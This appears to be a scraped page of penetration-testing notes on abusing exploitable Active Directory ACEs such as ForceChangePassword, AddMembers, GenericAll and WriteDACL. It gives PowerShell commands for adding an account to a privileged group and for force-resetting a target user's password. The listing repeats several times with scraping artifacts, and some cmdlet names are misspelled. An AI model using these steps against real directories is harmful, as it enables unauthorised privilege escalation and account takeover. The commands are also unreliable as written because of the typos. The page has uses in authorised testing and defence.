Exploitable ACEs

Tools: Bloodhound, AD-RSAT cmdlets, Powersploit

1) ForceChangePassword

2) AddMembers

3) GenericAll

4) GenericWrite

5) WriteOwner

6) WriteDACL

7) AllExtendedRights

Examples:

AddMember (AD-RSAT)

1)

Add-ADGrouMember "IT Support" -Members "MY.AD.ACCOUNT.USERNAME"

2)

Get-ADGroupMember -Identity "IT Support"

ForceChangePassword (AD-RSAT)

3)

Get-ADGroupMember -Idenitiy "Tier 2 Admins"

4)

$Password = ConvertTo-SecureString "PASSWORD" -AsPlaintext -Force

5)

Set-ADAccountPassword -Identity "TARGET_AD_ACCOUNT" -Reset -NewPassword $Password

6) Wait for synchronization (10 minutes max) then reconnect OR gpupdate /force then disconnect and reconnect

PreviousShadow Credentials NextDNS

Last updated 4 months ago

hashtagTools: Bloodhound, AD-RSAT cmdlets, Powersploit

hashtag1) ForceChangePassword

hashtag2) AddMembers

hashtag3) GenericAll

hashtag4) GenericWrite

hashtag5) WriteOwner

hashtag6) WriteDACL

hashtag7) AllExtendedRights

hashtagExamples:

hashtagAddMember (AD-RSAT)

hashtag1)

hashtag2)

hashtagForceChangePassword (AD-RSAT)

hashtag3)

hashtag4)

hashtag5)

hashtag6) Wait for synchronization (10 minutes max) then reconnect OR gpupdate /force then disconnect and reconnect

Tools: Bloodhound, AD-RSAT cmdlets, Powersploit

1) ForceChangePassword

2) AddMembers

3) GenericAll

4) GenericWrite

5) WriteOwner

6) WriteDACL

7) AllExtendedRights

Examples:

AddMember (AD-RSAT)

1)

2)

ForceChangePassword (AD-RSAT)

3)

4)

5)

6) Wait for synchronization (10 minutes max) then reconnect OR gpupdate /force then disconnect and reconnect